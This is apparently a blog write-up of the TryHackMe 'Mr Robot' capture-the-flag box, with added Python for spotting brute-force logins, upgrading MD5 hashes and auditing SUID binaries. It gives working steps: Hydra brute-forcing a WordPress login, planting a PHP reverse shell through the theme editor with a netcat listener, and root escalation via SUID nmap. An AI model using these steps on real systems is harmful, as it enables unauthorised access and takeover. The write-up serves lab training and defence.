Hello everyone. I’m Rahmos. Here is my Mr-Robot — TryHackMe — WriteUp. Check it out!
1/ The first key
First of all, let’s nmap the <ip> to see which ports are open.
nmap -A -T4 -p- -vv <ip>
You can see that ports 80 and 443 are open, which means an Apache web server is currently running on this machine.
So let’s check the website at port 80:
It first shows a video and some commands. That isn’t really useful for finding information.
Take a look at the “Hint”, it says “Robots”. Let’s go to “http://<ip>/robots.txt”
Here I can see the first key: key-1-of-3.txt
Go to “http://<ip>/key-1-of-3.txt”
2/ The second key
The “Hint” says: White color font. Not really clear, right? So let’s find out.
Roll back to robots.txt: there is a file called “fsocity.dic”. Let’s download the file using wget
wget -O robotpasswd.txt http://<ip>/fsocity.dic
*I chose robotpasswd.txt as my filename; you can choose any name you want.
Take a look at the file I’ve just downloaded. It looks like a large password file, so up next I need to brute-force the password.
However, which page am I going to log in to? Let’s use dirbuster to search for hidden directories of the website.
Alternatively you can use gobuster if you prefer CLI. Here’s the command:
gobuster dir -u http://<ip> -w /path-to-wordlist
Here you can see that the wp-login page responds with status code 200, which means we can access this page. Moreover, we now know that this site is running WordPress.
Access “http://<ip>/wp-login.php”. I can now brute-force the username and password using Hydra.
I need to get the HTTP POST form first, because Hydra requires that information to operate.
Using Burp Suite to intercept the request, I can get the http-post-form. Just enter any username and password to log in.
The login page gives the notification “Invalid username”. Note that for Hydra.
Now, let’s use Hydra to get the username first:
hydra -L robotpasswd.txt -p test <ip> http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:Invalid username" -t 30 -I -f
I’ve got the username “Elliot”. Try using this username to log in.
A different notification for wrong password. Note that for Hydra.
Now let’s Hydra the password!
hydra -l Elliot -P robotpasswd.txt <ip> http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:The password you entered for the username" -I -f
Wait a while and I’ve got the correct password: ER28–0652
Log in, and now I can access the admin page:
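The two Hydra runs above leave a very recognisable trace on the server side: a burst of POST requests to /wp-login.php from a single source address in the Apache access log. The following is an added example, not part of the original write-up or of any tool it uses. It parses constructed Apache combined-format log lines (the sample addresses, timestamps and the 20-attempts-per-minute threshold are my own assumptions) and reports any source that exceeds the threshold within a sliding window.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache combined log format; only the fields the detector needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "method": m.group("method"),
            "path": m.group("path"), "status": int(m.group("status"))}


def detect_login_bruteforce(lines, window_seconds=60, threshold=20):
    """Return {ip: peak_attempts} for every source whose POSTs to /wp-login.php
    reached `threshold` inside any `window_seconds` sliding window.
    Lines are assumed to be in chronological order, as a live log is."""
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    peak = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if not rec["path"].startswith("/wp-login.php"):
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        # Drop attempts that have aged out of the window.
        while (rec["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold:
            peak[rec["ip"]] = max(peak.get(rec["ip"], 0), len(q))
    return peak


def _sample_log():
    """Constructed sample: 25 rapid POSTs from one host (a Hydra-style burst)
    and an ordinary GET plus one POST from another host."""
    lines = []
    for i in range(25):
        lines.append(
            f'203.0.113.7 - - [10/Jan/2024:12:00:{i:02d} +0000] '
            f'"POST /wp-login.php HTTP/1.1" 200 4350 "-" "Mozilla/5.0"'
        )
    lines.append('198.51.100.4 - - [10/Jan/2024:12:00:05 +0000] '
                 '"GET /wp-login.php HTTP/1.1" 200 4350 "-" "Mozilla/5.0"')
    lines.append('198.51.100.4 - - [10/Jan/2024:12:00:09 +0000] '
                 '"POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"')
    return lines


SAMPLE_LOG = _sample_log()

if __name__ == "__main__":
    for ip, count in detect_login_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {count} login POSTs within 60s")
```

Point it at a real log with `detect_login_bruteforce(open("/var/log/apache2/access.log"))` and feed the flagged addresses to whatever blocking you already run (a fail2ban jail is the usual fit). The admin session obtained by this brute force is then turned into code execution through the theme editor in the next step; WordPress lets you remove that editor entirely by setting `define('DISALLOW_FILE_EDIT', true);` in wp-config.php.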
Now, let’s find a way to upload php-reverse-shell to the webpage.
In wp-admin, go to left navigation bar and select
Appearance → Editor and then select
Archives (archive.php) on the right
Paste the content of php-reverse-shell to archive.php
*Remember to change the <ip> address to your TryHackMe OpenVPN address. You can find it by accessing 10.10.10.10 in your browser.
Click Update and let’s open netcat to listen on port 1234.
nc -lvnp 1234
and I’ve got a reverse shell into the machine!
Spawn a tty shell using Python:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Move around to see files:
You can see “key-2-of-3.txt”. However, I cannot read this file as “daemon”. So let’s crack robot’s password using the file “password.raw-md5”.
Copy the MD5 hash and go to this link to decrypt robot’s password:
Now let’s su to robot using the password above. Got the 2nd key!
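The reason password.raw-md5 gave up robot’s password so quickly is that an unsalted MD5 is a fixed fingerprint of the password: the same input always produces the same 32 hex characters, so a precomputed table or an online lookup answers it instantly. The block below is an added example, not from the write-up, the box, or WordPress. It recognises a stored hash in that legacy format, verifies a login against it, and on success replaces it with a salted PBKDF2-HMAC-SHA256 hash from the Python standard library. The storage-string layout and the 600,000-iteration count are my own choices.

```python
import hashlib
import hmac
import os
import re


def md5_hex(password):
    """Unsalted MD5, the format found in password.raw-md5: deterministic, so
    identical passwords collide across users and are lookup-table friendly."""
    return hashlib.md5(password.encode()).hexdigest()


def is_legacy_md5(stored):
    """A bare 32-hex-digit string is a raw MD5 with no salt or algorithm tag."""
    return re.fullmatch(r"[0-9a-f]{32}", stored) is not None


def hash_password(password, salt=None, iterations=600_000):
    """Salted PBKDF2-HMAC-SHA256. The stored string carries the algorithm,
    cost and salt, so it can be verified (and later re-costed) without the
    plaintext. Assumed layout: algo$iterations$salt_hex$dk_hex."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Check a password against a PBKDF2 record; False for any other format."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return False
    _, iters, salt_hex, dk_hex = parts
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    # Constant-time compare so the verifier does not leak how much matched.
    return hmac.compare_digest(dk.hex(), dk_hex)


def check_and_upgrade(password, stored):
    """Verify a login against either format. Returns (ok, stored_after):
    a legacy MD5 entry that verifies is rehashed so the weak form is retired
    the next time the user logs in."""
    if is_legacy_md5(stored):
        ok = hmac.compare_digest(md5_hex(password), stored)
        return ok, (hash_password(password) if ok else stored)
    return verify_password(password, stored), stored


if __name__ == "__main__":
    # Constructed demo credential, not the box's password.
    legacy = md5_hex("correct horse")
    ok, upgraded = check_and_upgrade("correct horse", legacy)
    print(ok, upgraded[:40] + "...")
```

The migrate-on-login pattern is what lets you retire a file like password.raw-md5 without knowing anyone’s password: after each successful login the entry is rewritten in the strong format, and any entry still matching `is_legacy_md5` after a grace period belongs to an account that should be forced through a reset.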
3/ The final key
Let’s move to the final key. Look at the hint: it says “nmap”. So I know I can escalate privileges using nmap. Use “find” to look for SUID binaries:
find / -perm -u=s -type f 2>/dev/null
Here you can see nmap! Open an interactive shell using nmap:
nmap --interactive
Run this command to get root:
Now I’m root!
Let’s cd to /root and get the final key!
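The find command used for the final key is exactly the check a defender should be running on a schedule, with one addition: compare the result against a baseline so an unexpected setuid file such as nmap stands out instead of hiding among the normal entries. The block below is an added example, not from the write-up. The baseline set and the list of shell-capable programs are illustrative assumptions and should be replaced with what your own distribution’s packages actually install.

```python
import os
import stat

# Assumed baseline: setuid files a typical Debian/Ubuntu install is expected
# to carry. Replace with the list from your own package manifest.
EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/bin/su",
    "/bin/mount", "/bin/umount", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/bin/ping",
}

# Illustrative set of programs that can hand the caller a shell or arbitrary
# file access; setuid on any of these is a privilege-escalation path (nmap's
# old --interactive mode is the one this box relied on).
SHELL_CAPABLE = {"nmap", "vim", "vi", "find", "bash", "sh", "python",
                 "python3", "perl", "less", "more", "awk"}

# Pseudo-filesystems that are not worth walking.
PSEUDO_FS = ("/proc", "/sys", "/dev", "/run")


def classify_suid(entries, expected=EXPECTED_SUID):
    """entries: iterable of (path, st_mode). Returns [(path, reason)] for
    regular files with the setuid bit set that are not on the baseline."""
    findings = []
    for path, mode in entries:
        if not (stat.S_ISREG(mode) and mode & stat.S_ISUID):
            continue
        if path in expected:
            continue
        name = os.path.basename(path)
        if name in SHELL_CAPABLE:
            reason = "setuid binary that can spawn a shell"
        else:
            reason = "unexpected setuid binary"
        findings.append((path, reason))
    return findings


def scan_filesystem(root="/"):
    """Live equivalent of: find / -perm -u=s -type f 2>/dev/null"""
    entries = []
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath in PSEUDO_FS:
            dirnames[:] = []       # prune: do not descend into pseudo-fs
            continue
        for fn in filenames:
            p = os.path.join(dirpath, fn)
            try:
                # lstat so symlinks are not followed; they are skipped as non-regular.
                entries.append((p, os.lstat(p).st_mode))
            except OSError:
                continue
    return classify_suid(entries)


# Constructed sample mirroring what the box's find output showed: nmap with
# the setuid bit set, alongside normal files. 0o104755 = regular file + setuid.
SAMPLE_ENTRIES = [
    ("/usr/bin/passwd", 0o104755),
    ("/usr/local/bin/nmap", 0o104755),
    ("/usr/bin/ls", 0o100755),
    ("/opt/legacy-tool", 0o104755),
]

if __name__ == "__main__":
    for path, reason in classify_suid(SAMPLE_ENTRIES):
        print(f"{path}: {reason}")
```

Run `scan_filesystem()` as root from cron and diff its output against the previous run; on this box the fix is simply `chmod u-s` on nmap (or removing the outdated build that still offers --interactive), and the same report would also catch a setuid bit planted by an attacker as persistence.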